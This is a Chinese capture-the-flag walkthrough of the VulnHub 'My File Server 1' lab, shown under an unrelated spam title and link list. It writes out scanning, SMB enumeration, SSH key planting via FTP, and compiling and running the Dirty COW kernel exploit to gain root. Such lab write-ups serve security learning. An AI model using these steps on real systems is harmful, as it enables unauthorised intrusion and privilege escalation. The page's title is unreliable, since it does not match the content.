当前位置: 首页 > news >正文

手机网站底部广告代码提供手机自适应网站建设维护

手机网站底部广告代码,提供手机自适应网站建设维护,做包装设计的网站,东莞网站建设制作免费咨下载地址 https://download.vulnhub.com/myfileserver/My_file_server_1.ova 首先我们需要发现ip 我的kali是59.162所以167就是靶机的 然后我们拿nmap扫一下端口 nmap -sV -p- 192.168.59.167 扫完发现有七个端口开放 按照习惯先看80 没看到有啥有用信息,用nikto扫一下 nik…

下载地址

 https://download.vulnhub.com/myfileserver/My_file_server_1.ova

首先我们需要发现ip

我的kali是59.162所以167就是靶机的

然后我们拿nmap扫一下端口

nmap -sV -p- 192.168.59.167

扫完发现有七个端口开放 按照习惯先看80

没看到有啥有用信息,用nikto扫一下

nikto -h 192.168.59.167

发现了一个readme.txt

访问后发现了一个密码

但是不知道密码是哪个服务的 尝试一下ftp匿名登陆

连接上了也没有什么可以利用的信息

ssh连接显示没有权限(就不展示了)

尝试使用smbmap进行枚举 发现smbdate有读写权限

使用smbclient //192.168.59.167/smbdata     连接共享目录,只有smbdata可以匿名访问

下载secure和sshd_config

下载完退出smb(exit),然后cat查看这两个文件发现发现用户smbuser,密码chauthtok

现在已经有了用户名smbuser,而且一开始网页给了密码rootroot1。那么再尝试一下用ftp登录(不知道为啥密码不能用chauthtok)登录成功

进行ssh免密操作,然后上传到靶机 在进行ssh登入 登入成功

ssh-keygen -t rsa #生成公钥私钥文件

改成之前sshd_config文件里要求的名称。重新连接ftp,创建.ssh文件夹,上传文件,退出,ssh -i登录。

ssh -i test smbuser@192.168.59.167

下一步就是提权

这里发现内核版本较低,可以尝试使用脏牛提权

先搜索漏洞库

searchsploit dirty

下载到本地

searchsploit -m 40616.c

使用FPT上传脏牛文件到服务器 然后gcc编译提权

put /root/40616.c /tmp/dirty.c

重新ssh去到tmp下

gcc -pthread dirty.c -o dirty -lcrypt

执行./dirty 123456

可以看到权限已经获取到

成功获取flag

http://www.yayakq.cn/news/159239/

相关文章:

  • 做网站制作较好的公司永久免费的网站哪个好
  • 乐清建设路小学校园网站临夏网站建设
  • 网站开发师贴吧重庆网站公司推荐
  • 海外免备案网站网站建设备案书模板
  • 承德网站建设作用昆山企业做网站
  • 杨伟丽 郑州做网站教育网站建设案例
  • 深圳自助网站建设成都网站设计开发做得好
  • 做网站软件是什么下载在百度怎么建自己的网站
  • 企业网站做优化广西网络推广怎么做
  • 英语网站建设的必要性新手做地方门户网站
  • 公司网站设计注意什么做网站设计学那个专业好
  • 哪个网站可以预约做头发的菜鸟教程自学网
  • 做个人网站用什么程序天元建设集团有限公司张桂玉
  • 辽宁城乡住房建设厅网站首页游戏开发需要什么学历
  • 网站推广去哪家比较好苏州网站建设公司找哪家
  • 七牛云配置wordpress百度关键词seo年度费用
  • wordpress引用图片开封网站建设优化
  • 网站模板 源码之家wordpress插件手动升级
  • python工程打包供网站开发调用网站报错 自动404
  • 温州网站开发建设北京建筑设计公司排行榜
  • 网站设计和经营黄圃网站建设
  • 网站设计 论坛电商网页制作素材
  • 网站策划专员所需知识wordpress json接口
  • tp3企业网站开发百度云浙江平台网站建设哪家有
  • 专门做奢侈品的网站陕西网站制作电话
  • 自己搭建一个博客网站网站开发用不用写交互
  • 网站开发如何实现数据库的链接云浮源峰网站建设工作室地址
  • 枣庄网站建设枣庄买产品做企业网站还是博客
  • win8建立网站网络科技公司一般是做什么的
  • 辉南网站建设换脸图片在线制作